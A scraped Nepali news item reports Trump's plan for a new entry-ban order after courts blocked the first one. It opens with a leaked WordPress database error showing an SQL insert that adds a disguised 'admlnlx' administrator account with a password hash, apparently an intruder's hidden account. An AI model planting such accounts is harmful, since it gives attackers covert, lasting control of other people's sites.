WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BhgMv1QLeM7I.Vx2XCwqCuUxKedL.2/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 13:54:42', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ २९ –
अमेरिकी राष्ट्रपति डोनाल्ड ट्रम्पले केही सीमित मुलुकका नागरिकलाई अमेरिका प्रवेशमा रोक लगाउने नयाँ कार्यकारी आदेश जारी गर्ने भएका छन् ।
ट्रम्पले यसअघि जारी गरेको यस्तै आदेश कार्यान्वयनमा भने अदालतले रोक लगाइसकेको छ ।
तर, नयाँ कार्यकारी आदेश कस्तो हुनेछ भन्नेबारेमा भने स्पस्ट नभएको अन्तर्राष्ट्रिय सन्चारमाध्यमहरुले जनाएका छन् ।
राष्ट्रपति ट्रम्पले अमेरिका प्रवेशमा रोक लगाउने नयाँ आदेशमा केही परिवर्तन हुने बताएका छन् ।
सियाटलका न्यायाधीशले यसअघिको ट्रम्पको आदेश कार्यान्वयनमा रोक लगाइसकेका छन् भने यसविरुद्ध ट्रम्प प्रशासनले गरेको अपिल पनि अस्वीकृत भइसकेको छ ।
ट्रम्पले भने ‘संघर्षमा जित आफूहरुको हुने भएपनि केही समय भने लाग्ने’ बताएका छन् ।
ट्रम्पले सुरुको आदेशमा सिरियाका शरणार्थीलाई अर्को आदेश जारी नभएसम्म र अरु सात मुस्लिम बहुल मुलुकका नागरिकलाई तीन महिनासम्म अमेरिका प्रवेशमा रोक लगाएका थिए । – एजेन्सी